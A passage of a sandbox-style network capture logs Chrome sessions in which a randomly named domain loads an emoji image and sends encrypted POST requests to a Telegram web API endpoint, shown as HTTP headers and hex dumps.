                                  2025-01-12 00:03:59 UTC1369INData Raw: cf 82 63 ac 91 70 a9 8f 80 af 9d 17 aa 8d 6b e5 79 37 a9 96 18 a5 86 64 e5 6d 37 d6 69 5f c0 6f 74 9e 8d 16 df 60 3b ba 68 6d 9a 76 66 cd 5c 58 94 84 16 b8 5f 66 de 54 3a d0 4f 56 70 74 93 8a 7d 14 b2 59 60 bc 53 5a d8 43 42 84 76 13 66 6b 8d be 48 51 e5 35 43 db 3a 37 cc 3e 48 e2 33 40 e0 31 3e 5d 63 8c df 2f 3c dc 30 3c e4 27 47 d2 31 41 bc 3b 46 dc 2d 39 59 5e 86 da 2b 37 d7 2a 37 d7 28 36 d2 2a 37 d0 2b 37 d6 27 33 ca 2c 37 52 58 87 d3 26 33 d0 27 32 71 5a 1f d3 24 31 c1 2c 36 cf 24 30 ca 24 30 cf 21 2e cc 21 2e ca 20 2c 49 50 86 c2 23 2e cc 1d 2a af 2a 33 c8 1d 29 b6 24 30 c9 1b 28 c6 1b 28 c7 19 26 c4 19 26 42 48 82 c1 19 25 9f 26 2f b6 1a 25 3c 44 88 3b 43 86 3e 43 76 3a 42 84 39 41 84 98 21 2a a9 19 24 38 3f 82 36 3e 81 35 3d 7f 34 3c 7e 9c 18 21
                                  Data Ascii: cpky7dm7i_ot`;hmvf\X_fT:OVpt}Y`SZCBvfkHQ5C:7>H3@1>]c/<0<'G1A;F-9Y^+7*7(6*7+7'3,7RX&3'2qZ$1,6$0$0!.!. ,IP#.**3)$0((&&BH%&/%<D;C>Cv:B9A!*$8?6>5=4<~!
                                  2025-01-12 00:03:59 UTC1369INData Raw: 57 69 15 d6 05 8e b7 c4 1a 4e cb 72 52 06 2c e0 c1 1a 63 ad 33 b0 4c 58 49 d0 98 a5 6e 16 b7 6f ee 2c 06 d9 41 9c 92 3a 10 b8 20 50 41 32 48 44 57 ef 55 81 08 49 84 3e d3 ee cf 9b 8e b4 7f f9 fa db 77 de dc ec a0 99 c7 18 75 9e 89 24 54 40 94 43 b7 80 72 6a 9e 73 a4 c8 d1 45 aa ac 5e c2 cc 37 5f 31 ba bb e7 5e ba fa 7a f5 57 71 75 37 1c 0c 04 a8 ff fc 39 94 09 a7 89 13 32 8a b9 30 50 20 22 64 54 52 81 65 11 12 c2 50 bc f4 ea 8d ea c1 f6 83 f0 f2 8b 7b 3f 85 5b d0 5c 7b c7 31 d9 6f 3f d8 fa b1 0b 9c 98 f8 0b 3f 62 90 f5 7f 51 24 b2 9a 6a b3 b9 d3 fe ce e6 5b b7 83 dd a3 6e bb 54 df da 8c f1 e1 ec e1 1f b7 3f 94 c4 29 3b 89 82 5e 10 98 9d a7 6d 70 aa 8b 16 5c 31 79 fc 03 97 1e fe a6 bb d3 7f 89 31 bb df b6 ad 33 8c 3f e4 e1 11 8f 44 7d 50 94 25 2b b2 1c c9
                                  Data Ascii: WiNrR,c3LXIno,A: PA2HDWUI>wu$T@CrjsE^7_1^zWqu7920P "dTReP{?[\{1o??bQ$j[nT?);^mp\1y13?D}P%+
                                  2025-01-12 00:03:59 UTC1369INData Raw: 86 2e 74 50 b5 bd 71 dd e8 13 a0 5f c3 c8 08 c2 51 f7 1c ce 83 92 f5 8d b1 b1 de 07 c1 34 ee ea 2f fe d5 ba b3 98 c1 ab 14 93 b4 06 c2 06 5d 7a 0e 02 11 1e 03 a0 2e 66 b9 be aa 79 a1 be e4 bc 4a 71 1e b5 08 96 2b b5 e8 79 0c 6a ce f1 ba c2 bc 4a b1 02 0c 08 25 32 86 f5 08 f4 e7 4b 84 9f 87 c0 20 ba 94 18 10 86 59 1e 97 bb ed ed 6d 6b 14 89 b0 64 bb 54 44 02 e1 e2 79 84 c4 48 ff ee 97 94 28 63 07 d3 10 bf de da fe e2 49 f7 3f b8 a8 c4 d9 68 c2 e1 40 75 e7 fd f2 fc 1e 74 94 ab 32 ec c4 16 64 4c c3 85 6a 52 12 e5 0e 93 b5 0b df 16 95 76 67 01 b0 c9 d9 57 70 98 9f 98 7a 36 0e 08 b3 97 ce f9 a5 be 55 4c 13 9e 5b 19 15 cd 4a 85 12 99 98 22 de 82 70 f2 29 56 b4 09 b5 ed bc db a0 78 c5 24 e4 05 00 90 89 85 c2 90 f2 80 c2 76 0a da a4 0d 09 9a 75 10 c2 0c e4 d4 2b
                                  Data Ascii: .tPq_Q4/]z.fyJq+yjJ%2K YmkdTDyH(cI?h@ut2dLjRvgWpz6UL[J"p)Vx$vu+
                                  2025-01-12 00:03:59 UTC389INData Raw: b5 26 b6 23 b9 5a ad 39 63 d7 5d 61 be 28 ad f5 00 04 90 89 c1 24 a4 4c f4 1d a2 e4 68 c6 da 04 25 28 af 9d 40 50 9e 46 af 6b be 27 d6 18 c0 40 13 1b d1 ad 51 fb 94 03 e6 14 be 74 01 68 b7 ca 82 8a 47 e6 bc 19 e5 c9 3d 52 76 b9 35 63 b4 52 30 1a e2 2a 33 85 5f dd 8b 12 94 00 03 a8 cd 18 b2 2a b6 a8 36 9f 5b ef 36 ff 46 b7 96 17 47 81 4e 27 f7 2e ef 5e 5f 7d d7 be f0 17 78 3c 01 1c 81 e0 f1 21 04 3c 16 4f 08 d5 62 ec 43 b5 f5 d9 8d 77 01 86 44 b5 55 b1 1d f0 b7 5f 38 5e 17 c9 a7 f9 e0 3a 97 5e ac 16 a4 32 aa 1d 09 de 52 51 80 a5 61 eb da 8d 8b 90 02 b5 5a 74 33 d6 54 6e f3 62 61 03 6f 4c ba 35 7d ba 2c 28 d3 e7 00 b5 23 1e 71 38 80 50 cb 95 44 92 f4 f3 9f ce 93 a2 69 d4 a0 2e e9 c2 71 72 24 2c 09 42 3a 19 ff 06 51 29 04 02 44 d1 e5 03 d3 6b 4f 06 24 d0 a8
                                  Data Ascii: &#Z9c]a($Lh%(@PFk'@QthG=Rv5cR0*3_*6[6FGN'.^_}x<!<ObCwDU_8^:^2RQaZt3TnbaoL5},(#q8PDi.qr$,B:Q)DkO$


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  85192.168.2.649974149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:59 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:59 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:59 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:03:59 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  86192.168.2.649978149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:59 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 456
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:03:59 UTC456OUTData Raw: 2a 10 06 78 25 cb 00 4d 3c ec 34 c9 36 2e d7 c4 ed c1 17 d9 f4 3e cc 99 96 f1 db ec 62 b7 70 7d 85 23 ed 24 c6 f9 79 94 c4 be 89 d6 5d b6 15 9c b8 c3 6b 4b 16 ff 34 4a 51 45 10 5d 34 89 e7 4f 85 9b 4b 4d 5a e6 60 6c 1b a4 7f 99 3a 2d e4 d4 5b ac 8b 01 db 29 bb 24 18 28 d9 ef d9 7f c0 6a f7 9c d8 62 67 fd 15 5a ab de c3 9c 6b 7e b7 cf c8 1a 2a f5 f8 e6 b1 0b 1e aa dc 77 d6 f2 e1 56 16 20 90 51 4f 9f d4 40 21 8f 68 5a 6f 2f c6 7b 16 86 78 64 e1 08 1f fe 39 e7 36 47 db b5 23 8b ef cd 21 39 5b f1 c1 0c 76 36 05 95 c6 24 af 5d af 65 ca 7d e6 66 01 08 1b 89 77 b5 de 8f fd 8c 28 5f 38 a6 47 13 c8 8c 6a c5 9f 81 14 5e b6 79 36 33 24 e8 75 6d da 1c 3b b7 fd 3b a0 2c 7f 60 4d 96 94 cf c6 7c 72 b3 2e e2 19 52 b3 75 dc 81 0a c3 db 8d bd 40 6e 4a 11 db c8 dd 41 1b b1
                                  Data Ascii: *x%M<46.>bp}#$y]kK4JQE]4OKMZ`l:-[)$(jbgZk~*wV QO@!hZo/{xd96G#!9[v6$]e}fw(_8Gj^y63$um;;,`M|r.Ru@nJA
                                  2025-01-12 00:03:59 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:03:59 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 184
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:03:59 UTC184INData Raw: 2a 10 06 78 25 cb 00 4d ea 38 29 4b 20 3d d9 b5 15 a0 d4 8f d6 ab 19 8f 15 1f d5 41 2c eb 84 e6 64 9c d7 d9 a3 e4 c1 7e 2c 37 86 f4 79 e3 2f 46 15 8d f6 fb 3b 3d 15 14 4e c4 0a 4d 30 dd 6e f9 14 32 af db 6d 91 4b dd 41 ec 4d 77 27 85 85 35 d2 82 82 58 75 ab fc b5 be 41 33 b3 a4 51 ef 99 37 10 9c 22 ef e6 e3 da d6 c4 2b af 9a de c6 55 a1 6f 5a 49 f0 58 1d 27 6b f8 72 f9 13 9e fd 25 5b 72 fd 72 45 30 4e ca 58 32 be a8 b3 49 c1 d6 c9 fd 75 19 e0 f3 34 69 d7 8c c4 b6 76 4a 82 ee 6b f3 5b 6c 50 72 1d 55 1e f4 eb 79 03 21 24 b1 80 3a 29 fb fb 7f da 77
                                  Data Ascii: *x%M8)K =A,d~,7y/F;=NM0n2mKAMw'5XuA3Q7"+UoZIX'kr%[rrE0NX2Iu4ivJk[lPrUy!$:)w


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  87192.168.2.649984172.67.137.414432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:03:59 UTC608OUTGET /img-apple-160/1f1e6-1f1f4.png HTTP/1.1
                                  Host: wkybcnfuqpgjx.ltd
                                  Connection: keep-alive
                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                  sec-ch-ua-mobile: ?0
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  sec-ch-ua-platform: "Windows"
                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                  Sec-Fetch-Site: same-origin
                                  Sec-Fetch-Mode: no-cors
                                  Sec-Fetch-Dest: image
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:00 UTC902INHTTP/1.1 200 OK
                                  Date: Sun, 12 Jan 2025 00:04:00 GMT
                                  Content-Type: image/png
                                  Content-Length: 4635
                                  Connection: close
                                  Last-Modified: Thu, 28 Nov 2024 10:06:42 GMT
                                  ETag: "674840b2-121b"
                                  Cache-Control: max-age=14400
                                  CF-Cache-Status: REVALIDATED
                                  Accept-Ranges: bytes
                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xfl9b6KtNE%2Bq1J5A5UT3ppYuyobTU2%2BjtlFjOnvRF4BMNIH4hRYMy0bvUSfioY6yuZAzjqi94Zr8UzwXM9AqNg0OZo35y2J2n23vMgH%2BCVugKwnwr%2BttLVlLNWbe9PBDrx3%2Feg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                  Server: cloudflare
                                  CF-RAY: 9008e2fbaea872a4-EWR
                                  alt-svc: h3=":443"; ma=86400
                                  server-timing: cfL4;desc="?proto=TCP&rtt=1799&min_rtt=1794&rtt_var=683&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1186&delivery_rate=1588683&cwnd=212&unsent_bytes=0&cid=27ad34158a75652b&ts=588&x=0"
                                  2025-01-12 00:04:00 UTC467INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a0 00 00 00 a0 08 03 00 00 00 bc 11 97 1f 00 00 03 00 50 4c 54 45 47 70 4c 51 34 37 0a 0a 0a b3 69 71 19 0d 0e b0 63 6b 0c 0c 0c b8 6f 77 b3 6a 72 0b 0b 0b bb 72 7a 0c 0c 0c 0c 0c 0c b1 66 6d 8d 20 2d 61 1c 24 16 16 16 0b 0b 0b b5 6c 74 9a 33 3f 08 08 08 77 09 15 34 04 09 03 03 03 b0 68 70 90 34 3d 0c 0c 0c ba 71 78 0c 0c 0c b2 69 71 0b 0b 0b b2 68 6f 0e 0e 0e bb 71 79 07 07 07 0b 0b 0b ae 66 6d ba 71 79 11 11 11 0e 0e 0e ba 71 78 92 37 41 07 07 07 04 04 04 12 12 12 b8 6f 77 06 06 06 03 03 03 ff ff 37 ff f9 39 ff f6 38 ff f2 38 fe ee 37 fe eb 37 fe e8 38 fd e3 37 ff e0 38 f9 e0 37 fb dd 38 f9 da 37 f7 d8 36 f3 d5 36 ed ce 37 f6 c8 39 f1 bb 3a df c5 34 d7 bf 35 ed a8 3b cd b6 32 eb 9b 3c c1 ac 32 e8
                                  Data Ascii: PNGIHDRPLTEGpLQ47iqckowjrrzfm -a$lt3?w4hp4=qxiqhoqyfmqyqx7Aow7988778787876679:45;2<2
                                  2025-01-12 00:04:00 UTC1369INData Raw: c6 28 39 d0 20 46 b2 30 3e 63 5c 2a c7 26 37 c3 25 36 cf 1b 46 c5 23 34 c2 23 34 b7 28 37 9e 32 3e c2 21 32 be 22 33 c0 20 31 ac 29 37 cb 1a 2d be 1f 30 b9 21 30 92 32 3c be 1d 2e b3 21 31 cc 0f 47 bc 1c 2d 57 50 28 b8 1d 2d ab 22 31 ba 1a 2b b2 1c 2c c5 13 26 b8 19 29 b6 18 29 9b 22 2f b3 17 27 bd 12 24 b5 15 26 ac 19 29 84 2a 33 b1 14 25 b3 12 24 af 13 23 b2 11 22 49 45 28 5d 39 2e ad 11 22 af 10 21 8c 1f 2a ad 0f 1f aa 0f 20 ac 0e 1e a6 0e 1f 9f 0e 1e 92 14 21 96 0e 1c 77 1b 2a 95 0e 1b 95 0d 1b 63 23 2c 3b 37 26 7e 11 1d 88 0b 18 31 2f 26 48 22 26 7a 0a 16 75 0a 16 28 27 26 26 26 26 25 25 25 24 24 24 1d 25 24 22 22 22 57 09 11 21 21 21 1f 20 20 3a 13 17 1e 1f 1f 1d 1e 1e 10 24 21 2d 15 1a 1c 1c 1c 1b 1b 1b 1a 1a 1a 17 19 24 19 19 19 18 18 18 11 1b 1a
                                  Data Ascii: (9 F0>c\*&7%6F#4#4(72>!2"3 1)7-0!02<.!1G-WP(-"1+,&))"/'$&)*3%$#"IE(]9."!* !w*c#,;7&~1/&H"&zu('&&&&%%%$$$%$"""W!!! :$!-$
                                  2025-01-12 00:04:00 UTC1369INData Raw: 1b 5b 3f ac 05 3a d6 8d 24 e8 09 54 c8 16 10 e7 cc e9 02 71 c6 62 69 74 80 09 74 01 31 6b 80 72 57 58 a9 57 d7 03 aa a0 67 05 3d 90 c6 a9 03 bd af 05 74 6c 00 f4 b7 5a 3e 59 38 7a 58 4d 5c e0 aa bd 80 a8 35 40 fc 4b ba ae 0a 9e 2e 50 43 06 d4 ac 01 6a 3a 40 8d 05 26 8a c9 e4 bf bd 22 0b 6a ea b2 c5 1e 5d d2 0d 54 62 2d d0 72 7a 40 ef f3 2e 03 c6 75 03 85 13 ce 18 0c 19 50 16 9e a9 c9 a0 5e 0e 1a c1 f9 97 be 4e b1 96 a8 8d 81 04 5b 0f 6c 8d d6 76 80 fe f9 21 f1 d8 52 e8 54 e4 e2 d1 ab 26 16 1a 0b 3b a9 46 27 02 73 6c 09 50 d3 02 5a 3a c0 8c 66 68 8e 81 6e 03 d3 1b a6 f5 7c b1 f2 74 25 02 81 73 d1 c8 b5 cf bf 50 bc 76 b5 14 75 77 89 3a 11 98 d2 91 67 0e 34 06 d6 00 c1 73 f1 f2 0e f0 e8 8b 95 48 08 c0 35 18 b7 25 b5 f3 83 4b 16 03 6a 3b 80 16 8c 6d 01 75 b6
                                  Data Ascii: [?:$Tqbitt1krWXWg=tlZ>Y8zXM\5@K.PCj:@&"j]Tb-rz@.uP^N[lv!RT&;F'slPZ:fhn|t%sPvuw:g4sH5%Kj;mu
                                  2025-01-12 00:04:00 UTC1369INData Raw: bf 0b 18 17 32 10 80 ab b9 89 57 6e 4b 42 20 49 26 ef de 77 28 11 b4 e2 76 bf 76 7b 1c 6a 23 3f f3 a1 59 b6 14 e8 5f 3e be 68 35 28 e9 e3 95 2c 0e 91 66 05 12 67 70 58 e4 de 1b 5f 1f 76 80 ad 17 7f e5 37 cb 6f 08 b2 88 f3 7f fb c5 82 0d 74 f1 6f 6c bc 0d 40 87 ff d3 fd 59 f8 d1 58 80 d8 58 8c c3 3a 9c c9 1e 31 67 ff e0 56 9d f3 4f c6 62 e6 4f cf 3e 6c 84 9f e6 ac c3 b7 c6 51 ed bd 9f 59 38 af ca f6 01 9d 73 b4 fe 2f d0 d9 94 65 2d 27 00 1d e7 3c f0 cf 22 e7 ab ae 93 b1 4f df 90 f5 4a f0 ee 1b 67 87 1a f9 bf 78 ff d1 92 e8 33 d0 46 7b ee 7c ba 11 2a 00 17 cb 99 3b cf 7b 2d 11 ee 7d 5f fe a7 50 55 f7 3d f8 82 80 7e 03 6d 7e e6 c9 fb 17 4c a0 04 a0 1b e3 9f be be fc 46 b3 43 6a b9 78 62 ff 62 f5 1d 00 c4 06 67 95 1f ff 7a a9 a6 42 01 ae 21 77 dd f1 fe a3 37
                                  Data Ascii: 2WnKB I&w(vv{j#?Y_>h5(,fgpX_v7otol@YXX:1gVObO>lQY8s/e-'<"OJgx3F{|*;{-}_PU=~m~LFCjxbbgzB!w7
                                  2025-01-12 00:04:00 UTC61INData Raw: ae c9 00 38 00 0e 80 1b 64 00 1c 00 07 c0 0d 32 00 0e 80 03 e0 06 19 00 07 c0 01 70 83 0c 80 03 e0 00 b8 41 06 40 9f ff 03 f2 03 33 91 e6 19 9e a3 00 00 00 00 49 45 4e 44 ae 42 60 82
                                  Data Ascii: 8d2pA@3IENDB`


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  88192.168.2.649987149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC350OUTGET /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Sec-Fetch-Site: none
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:00 UTC312INHTTP/1.1 404 Not Found
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:00 GMT
                                  Content-Type: text/html
                                  Content-Length: 169
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  2025-01-12 00:04:00 UTC169INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 30 2e 33 2e 33 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/0.3.33</center></body></html>


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  89192.168.2.649986149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC449OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 88
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:00 UTC88OUTData Raw: 2a 10 06 78 25 cb 00 4d ac 9f c9 21 b9 e9 b7 03 37 07 77 bc 1b b8 20 f0 6e 73 be ac 3f c6 b6 a6 61 39 ea ad a1 3e d9 b2 be 2b 54 e8 1e 5b ac 2b a3 f4 66 21 69 f1 4a 3d 9d b3 ae 2b df 6f 0e e7 9b 2f 6e bf 94 8e 58 be a0 41 b1 5a bf a4 7c 01 e5 16 15 26 e8 7c 42 58
                                  Data Ascii: *x%M!7w ns?a9>+T[+f!iJ=+o/nXAZ|&|BX
                                  2025-01-12 00:04:00 UTC408INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:00 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 648
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
                                  2025-01-12 00:04:00 UTC648INData Raw: 2a 10 06 78 25 cb 00 4d 20 9f e0 a2 17 f5 10 04 0c 04 f9 7b 0e 3f 13 a1 98 bd 92 c8 c3 c5 42 b6 9f 96 33 87 45 45 7e 29 80 70 06 c5 3c ed 03 94 fd ee 11 87 40 51 29 88 1e 45 e2 5b 70 54 a3 86 4e d9 9c 29 e0 1e b6 7b 05 4b 18 ad 1b 0e 84 59 ca 66 f7 ec 44 53 7a ab f9 61 c9 d2 0c 55 6e 5b f1 a5 4f c9 fb c3 be be 6a 32 ae a1 54 ca 96 9c 4f 56 ee 33 56 47 e3 36 8e 9f ac ad 5b 8a c6 61 21 79 19 90 07 fc ec 92 59 e8 50 a0 a5 c3 47 dc 05 82 56 38 87 e8 34 f9 72 03 4f fe e7 33 72 0b 23 d0 93 33 70 66 76 95 0a 81 f1 04 ac 06 f2 b2 9f d4 f1 3d e9 ca ce da b3 e0 96 ef 10 b3 0d 2c 13 f4 8f 84 34 48 30 94 3b e8 97 65 05 30 e4 4d 64 27 dc c4 49 c6 a8 f0 a9 29 72 dd ec c0 45 4f 3b 80 1f d0 97 91 f3 9a 85 73 34 61 08 dd 32 6c 01 61 7c 41 8d 90 06 ac 14 e8 1e 25 4a 0c 8f
                                  Data Ascii: *x%M {?B3EE~)p<@Q)E[pTN){KYfDSzaUn[Oj2TOV3VG6[a!yYPGV84rO3r#3pfv=,4H0;e0Md'I)rEO;s4a2la|A%J


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  90192.168.2.649988149.154.167.994432644C:\Program Files\Google\Chrome\Application\chrome.exe
                                  TimestampBytes transferredDirectionData
                                  2025-01-12 00:04:00 UTC450OUTPOST /apiw1 HTTP/1.1
                                  Host: zws2.web.telegram.org
                                  Connection: keep-alive
                                  Content-Length: 360
                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                  Accept: */*
                                  Origin: https://wkybcnfuqpgjx.ltd
                                  Sec-Fetch-Site: cross-site
                                  Sec-Fetch-Mode: cors
                                  Sec-Fetch-Dest: empty
                                  Referer: https://wkybcnfuqpgjx.ltd/
                                  Accept-Encoding: gzip, deflate, br
                                  Accept-Language: en-US,en;q=0.9
                                  2025-01-12 00:04:00 UTC360OUTData Raw: 2a 10 06 78 25 cb 00 4d 83 39 ca 68 24 f5 55 bd 89 af 4f ed b1 7a ef 9d 01 21 32 2f 89 00 db a3 61 40 85 1c 21 83 d7 df ad cc 78 79 7e 17 08 9f 9d 38 7d c8 ad 97 9b 8c d7 e9 b5 7e ec 6a 4b 7a b2 fa cc 3a ec a6 29 15 0c 6b 46 0e ad 85 fe 23 14 89 b0 ee bb 21 6b dc 1e 36 ef cd 1f 53 0d 24 33 0c c3 d0 a5 0d bb ed c9 6a f7 94 a0 a3 3b 95 cb 72 f4 38 e5 cc f6 63 bd 88 fa 08 01 e7 42 b6 f8 8e c6 b3 a8 e0 dc 3a f1 dd 3f 30 ce 91 b7 fa 82 4a 6f d6 68 f0 5c 24 29 d0 02 0b f2 04 4d 30 12 1e 82 e6 ee 53 1b 7f a9 96 d1 98 cc 43 56 7e ba 79 35 af 88 cf 0a 64 9e 37 ae 56 d1 ef 7e 33 6c f3 1f 5e 7c 4e c0 cc 96 29 50 3f 5e 94 bb 50 d9 0d bd b8 a4 a5 b4 52 94 e7 b3 f5 00 20 47 02 70 1f 15 24 ad 98 3c b6 6b 32 74 c2 db 23 70 63 8e 59 d2 54 fb cf 55 cc a4 95 36 c2 13 f4 39
                                  Data Ascii: *x%M9h$UOz!2/a@!xy~8}~jKz:)kF#!k6S$3j;r8cB:?0Joh\$)M0SCV~y5d7V~3l^|N)P?^PR Gp$<k2t#pcYTU69
                                  2025-01-12 00:04:00 UTC410INHTTP/1.1 200 OK
                                  Server: nginx/1.18.0
                                  Date: Sun, 12 Jan 2025 00:04:00 GMT
                                  Content-Type: application/octet-stream
                                  Content-Length: 49448
                                  Connection: close
                                  Pragma: no-cache
                                  Cache-control: no-store
                                  Access-Control-Allow-Origin: *
                                  Access-Control-Allow-Methods: POST, OPTIONS
                                  Access-Control-Allow-Headers: origin, content-type
                                  Access-Control-Max-Age: 1728000
                                  Strict-Transport-Security: max-age=35768000
